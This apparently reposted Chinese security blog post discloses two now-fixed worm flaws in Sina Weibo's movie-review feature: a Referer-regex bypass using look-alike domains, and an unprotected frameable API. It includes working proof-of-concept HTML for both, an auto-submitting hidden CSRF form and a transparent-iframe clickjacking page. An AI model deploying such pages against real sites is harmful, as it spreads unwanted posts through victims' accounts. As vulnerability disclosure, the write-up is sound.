新浪微博 CSRF & ClickJacking 蠕虫

Posted Evilsay

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了新浪微博 CSRF & ClickJacking 蠕虫相关的知识,希望对你有一定的参考价值。

CSRF Worm


该漏洞出现在微博电影榜站点,用户可为每场电影进行点评分享到微博,发送分享的 API 的 Referer 防御体系可被绕过,导致攻击者可攻击受害者不断传播恶意微博。(已经修复)


API: http://movie.weibo.com/page/weiboplugin/ajax_sendweibo
POST: content=test%20worm.




当 Referer 为非 http://moive.weibo.com/test_path/ 时,后端正则会进行来源判断以防止攻击者进行 CSRF 等攻击,经测试发现该正则可被绕过,使用例如:


  • moive.weibo.com.linux.im

  • test.weibo.com.linux.im

  • *.weibo.com.*.*


新浪微博 CSRF & ClickJacking 蠕虫


这样我们就能够通过构造一个四级域名来绕过 Referer 检测,从而使用 dom 自动提交表单的方式来发起蠕虫,下面为我当时编写的测试页面。


http://test.weibo.com.linux.im/etreehome/test.html :


<html>

<head><title>404 Not Found</title></head>

<body bgcolor="white">

<center><h1>404 Not Found</h1></center>

<hr><center>nginx</center>

<iframe style="border:0px;width:0px;">

</body>

</html>

<!-- a padding to disable MSIE and Chrome friendly error page -->

<!-- a padding to disable MSIE and Chrome friendly error page -->

<!-- a padding to disable MSIE and Chrome friendly error page -->

<!-- a padding to disable MSIE and Chrome friendly error page -->

<!-- a padding to disable MSIE and Chrome friendly error page -->

<!-- a padding to disable MSIE and Chrome friendly error page -->


http://test.weibo.com.linux.im/etreehome/pdb.html :


<div style="display: none;">

<form action="http://movie.weibo.com/page/weiboplugin/ajax_sendweibo" method="post" name="e3" enctype="application/x-www-form-urlencoded">

<input type="hidden" name="content" value="我简直就是 E+tree+home ~~~ 这个设计如此绝妙:http://test.weibo.com.linux.im/etreehome/test.html"/>

<button type="submit"></button>

</form>

</div>

<script>

setTimeout("document.e3.submit()", 2000);

</script>


新浪微博 CSRF & ClickJacking 蠕虫


ClickJacking Worm


问题出现在另外一个点评 API 处,未对 iframe 嵌入及 Referer 做判断验证,导致可被攻击这伪造页面发起 ClickJacking 攻击,虽然比起上一个漏洞增加了次用户交互,但效果看起来可能比上面的更好。


新浪微博 CSRF & ClickJacking 蠕虫


http://evi1m0.sinaapp.com/etreehome/girl.html :


<html>

<head>

<title>E+tree+home</title>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<style>

/*

Author: Evi1m0

*/

iframe {

width:800px;

height:700px;

top:335px;

left:300px;

z-index:5;

position:absolute;

-moz-opacity:0;

opacity:0;

filter:alpha(opacity=0);

}

img.div-test {

z-index:1;

position: absolute;

top:-20px;

left:350px;

}

.send-weibo {

width: 800px;

height: 700px;

top: 670px;

left: 830px;

z-index: 2;

position: absolute;

-moz-opacity: 0;

opacity: 1;

filter: alpha(opacity=0);

}

</style>

<script>

document.documentElement.style.overflow='hidden';

</script>

<link rel="stylesheet" href="http://cdn.bootcss.com/bootstrap/3.3.5/css/bootstrap.min.css">

</head>

<body style="background-color: #000">

<iframe scrolling="no"/></iframe>

<img class="div-test">

<div class="send-weibo">

<button class="btn btn-success" onclick="setTimeout('window.close();', 1000)">进入</button>

<button class="btn btn-default" onclick="setTimeout('window.close();', 1000)">离开</button>

</div>

</body>

</html>



End


  • 抱歉,此内容违反了《微博社区管理规定(试行)》或相关法规政策,无法进行指定操作。查看帮助:http://t.cn/8sYl7QG。

  • 您访问的应用已经被新浪云计算(SAE)封禁可能原因如下:1.游戏私服2.黄、赌、毒3.假药4.有盗版内容、违法内容和其它不符合SAE规定的网站 (详情)

  • 该用户已被冻结,无法查看其微博内容。

  • 您好,由于您之前违反相关规定,导致现在部分功能受限,您可以在12月5日下午尝试,给您带来的不便,十分抱歉! 点此: http://t.cn/xxxxx 查看详细内容。



长按二维码,打赏一杯咖啡钱:




Evi1m0@KnownSec


每条回复必看,部分文章将会更新至博客:http://linux.im

感谢关注,喜欢本文就点击右上角分享一下,微信搜索:Evil-say

如果你有好的想法、创意、合作意向,可以给我留言或者邮件:evi1m0.bat@gmail.com


以上是关于新浪微博 CSRF & ClickJacking 蠕虫的主要内容,如果未能解决你的问题,请参考以下文章

分享到QQ空间和新浪微博功能

裴东辉-如何使用新浪微博API开放平台进行程序开发http://www.cnblogs.com/dhsunny/p/3578399.html?utm_source=tuicool&utm_me

CSRF漏洞的挖掘与利用

新浪微博分享链接代码

新浪微博oauth2.0

[deviceone开发]-QQ分享微信分享和新浪微博分享